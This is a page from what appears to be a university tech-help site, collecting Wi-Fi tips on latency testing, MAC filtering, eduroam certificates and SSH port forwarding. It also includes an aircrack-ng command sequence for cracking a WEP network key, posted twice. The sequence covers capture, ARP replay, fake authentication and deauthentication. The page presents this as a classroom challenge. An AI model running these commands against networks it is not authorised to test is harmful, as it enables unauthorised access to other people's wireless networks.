WLAN

Slow internet response time

some more options:

Test response time of your connection.
On Windows you can use ping

  • press windows key + R
  • enter "cmd" (without "") and press Enter
  • command window opens
  • enter "ping orf.at -t" (without "")
  • look if the time=xx values are constant

Test during different daytimes, some connections are overloaded in the morning or evening.

Contact your Internet Service Provider and ask for a test site (e.g. http://www.speedtest.net/, but ISPs often provide own solutions, to test the speed within there network.)
Do not hesitate to contact them, especially consumer ISPs do not monitor there connections proactive for service decreases (only failures). If you call them, they'll have a closer look and might find a bad link.
If you are sure the problem is not on your site, contact them more frequently if they provide no proper solution.

If you are connected through WLAN, make sure this is not the bottle neck. Real bandwidth is often much lower than theoretical bandwidth. WLAN uses a shared media (air) so if there are more clients connected bandwidth and response time can decrease.

Taggings:

creating mac-filtering for your router

enter the configuration of your router by entering its ip-address in the addressbar of your browser.

if you don't know the ip-address of your router, perform the following steps:
-connect to your router
-open a command shell (all programms -> accessories)
-type the command "ipconfig" and press enter
-search the output for your wlan connection and lookup the address of the default gateway
-that's the ip-address of your router

now you can enter the router configuration with your credentials.
in the configuration look for mac-filtering and enter those mac-addresses which should be allowed to use your wifi.

if you want to find out a mac-address of a windows 7 pc follow this link:
http://uklaninfo.rrz.uni-koeln.de/info/macwin7.html

mac-filtering wifi router

I want to create a mac-address filtering for my wifi, so that only mac-addresses which are confirmed by myself are able to use connect to the wifi.

CA Certificate

For Linux machines it is necessary to set the correct CA certificate as well. The installed certificates are stored at /etc/cert.
As many users are Using Ubuntu I give step-by-step instructions for this distribution. For other distros the steps are similar.

  • Open the Network Connection Settings-dialogue either via "System Settings" or via the Network-Icon on the menu bar on top of the screen
  • Select your eduroam-connection from the list of connections and choose "Edit"
  • Choose the "Wi-Fi Security"-tab.
  • Have a look at the "CA certificate"-settings. The certificate Deutsche_Telekom_Root_CA_2.pem has to be set. This can be done by just klicking on the button right of the label "CA certificate". The machine shall search in the right folder automatically. If not, choose /etc/cert

The attached picture shows the correctly filled in Settings dialogue.

Taggings:

Avoid re-login to eduroam for Linux-machines

As other Linux-users I experience the problem, that I have to re-connect to the eduroam Wireless network every time I restart the laptop or even after waking it up from hibernate or sleep state. In that case I have to re-enter the password although it is set to be already stored along with the other settings for the eduroam connection. While this is not a serious problem it is still cumbersome. My laptop-settings are to go to sleep-mode automatically when the lid is closed to save battery power, so even during one course there might be the necessity to re-authenticate several times. What settings are needed to overcome this problem?

Use aircrack-ng

--This solution had been mistakenly posted to the 'Manage News Sources' challenge (https://techscreen.tuwien.ac.at/node/1365)--

Run the software aircrack-ng under Linux and enter the following commands in the shell:

  • sudo airmon-ng start wlan0 - to start the wlan in promiscuous mode
  • sudo airmon-ng wlan0 - to see all interfaces (mon0, which is monitoring the traffic, appears)
  • sudo airodump-ng wlan0 - to see all traffic, you can find the bssid of the desired network
  • sudo airodump-ng -c 8 --bssid [found bssid] -w output mon0 - capture all traffic with the chosen network and write it inside 'output'
  • sudo aireplay-ng -3 -b [found bssid] mon0 - to send ARP packages to it
  • sudo aireplay-ng --fakeauth 0 -a [found bssid] mon0 - to make fake authentication (to send packages to the wanted network so its key can be cracked afterwards)
  • sudo aireplay-ng --deauth 0 -a [found bssid] mon0 - to make fake deauthentication
  • sudo aircrack-ng output-01.cap - to crack the key (using ~52000 IVs)

Now you should be able to read the network key out of the file.

Taggings:

Use aircrack-ng

--This solution has been moved to the 'Crack WEP' challenge as it had been mistakenly set as solution for managing news sources (https://techscreen.tuwien.ac.at/node/1437).--

Run the software aircrack-ng under Linux and enter the following commands in the shell:

  • sudo airmon-ng start wlan0 - to start the wlan in promiscuous mode
  • sudo airmon-ng wlan0 - to see all interfaces (mon0, which is monitoring the traffic, appears)
  • sudo airodump-ng wlan0 - to see all traffic, you can find the bssid of the desired network
  • sudo airodump-ng -c 8 --bssid [found bssid] -w output mon0 - capture all traffic with the chosen network and write it inside 'output'
  • sudo aireplay-ng -3 -b [found bssid] mon0 - to send ARP packages to it
  • sudo aireplay-ng --fakeauth 0 -a [found bssid] mon0 - to make fake authentication (to send packages to the wanted network so its key can be cracked afterwards)
  • sudo aireplay-ng --deauth 0 -a [found bssid] mon0 - to make fake deauthentication
  • sudo aircrack-ng output-01.cap - to crack the key (using ~52000 IVs)

Now you should be able to read the network key out of the file.

Taggings:

Crack WEP

WEP, the Wired Equivalent Privacy, protocol for wireless networks, is known to be insecure and can be cracked within minutes.

Securing Wireless Network: WPA/WPA2

This Challenge explains how to configure WPA/WPA2 encrypted security on NETGEAR wireless routers. It can also be applied to NETGEAR access points. It should help in case you lost or are unable to use the Router Configuration CD. I will also provide default Password for NETGEAR Devices.

With Tomato compatible router - use its SSH daemon

For this solution you need:

  • a Tomato compatible router
  • a fixed ip address

Tomato is an alternative firmware for Broadcom-based routers like Linksys WRT54G/GL/GS and others.

If you have Tomato installed:

    Configure router:
  1. connect to your router and log in
  2. Go to Administration - Admin Access
  3. in Section SSH Daemon:

  4. check : "Enable at Startup"
  5. check: "Remote Access"
  6. choose a port - (this port be used from outside - you might want to use a port which differs from ssh - default)
  7. There are two ways to access from outside, with the routers admin name and password, or a generated SSH key. (for the latter see further down)

  8. check: "Allow Password Login" (make sure to choose a safe one!)
  9. Save Settings

To establish a remote desktop connection from outside the LAN: Start Putty

  1. Set up a SSH connection to your computer: [your IP-address] and the remote port you defined before
  2. Set up SSH port forwarding:
  • Source port: choose one - 6666
  • Destination: <local-ip of computer you want to connect to>:<port of service you want to connect to, e.g: 3389> - for remote desktop connection
  • local, auto: checked
  • -> Add

From now on you only have to open the SSH connection, and all communication going to e.g. 6666 will be forwarded to the LAN (You will have to enter the routers admin-username and password.)
You can open the remote desktop connection: connect to localhost: (e.g. 6666)

To improve security, you can use ssh keyfiles instead of the routers credentials.

  1. Start putty gen and generate a key
  2. copy the key to the clipboard , open the routers admin console and paste the key into the field: Authorized Keys, save changes
  3. store the key to a ppk file
  4. Open putty, go to Connection-SSH-Auth, and Browse-select the ppk file
  5. Now, when you open the previously stored SSH connection, enter the password for the SSH key

Pages

Subscribe to WLAN